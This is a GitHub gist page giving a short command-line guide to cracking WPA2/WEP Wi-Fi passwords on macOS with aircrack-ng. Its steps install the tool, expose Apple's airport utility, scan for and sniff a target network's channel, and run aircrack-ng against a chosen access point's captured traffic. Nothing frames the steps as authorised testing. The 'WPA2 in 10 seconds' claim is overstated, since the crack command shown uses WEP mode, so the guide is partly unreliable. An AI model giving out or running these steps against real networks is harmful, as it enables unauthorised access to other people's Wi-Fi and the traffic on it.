Skip to content

Instantly share code, notes, and snippets.

@daubac402
Forked from victorreyesh/Aircrack Commands
Last active September 5, 2018 03:01
Show Gist options
  • Save daubac402/83637fa5e87cf56ac6254597555c8eb4 to your computer and use it in GitHub Desktop.
Save daubac402/83637fa5e87cf56ac6254597555c8eb4 to your computer and use it in GitHub Desktop.
Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX
//Install Macports or brew
//Install aircrack-ng
sudo port install aircrack-ng
//or
brew install aircrack-ng
//Install the latest Xcode, with the Command Line Tools
//Create the following symlink
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
//Figure out which channel you need to sniff
sudo airport -s
sudo airport en1 sniff [CHANNEL TO SNIFF]
// for Eg: sudo airport en1 sniff 13
// Open a new Terminal Window
aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS (from airport -s list)] [CAP_FILE (located in the /tmp/airportSniff*.cap)]
// for Eg: aircrack-ng -1 -a 1 -b 06:2b:8b:61:4a:82 /tmp/airportSniff2Mv3pS.cap
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment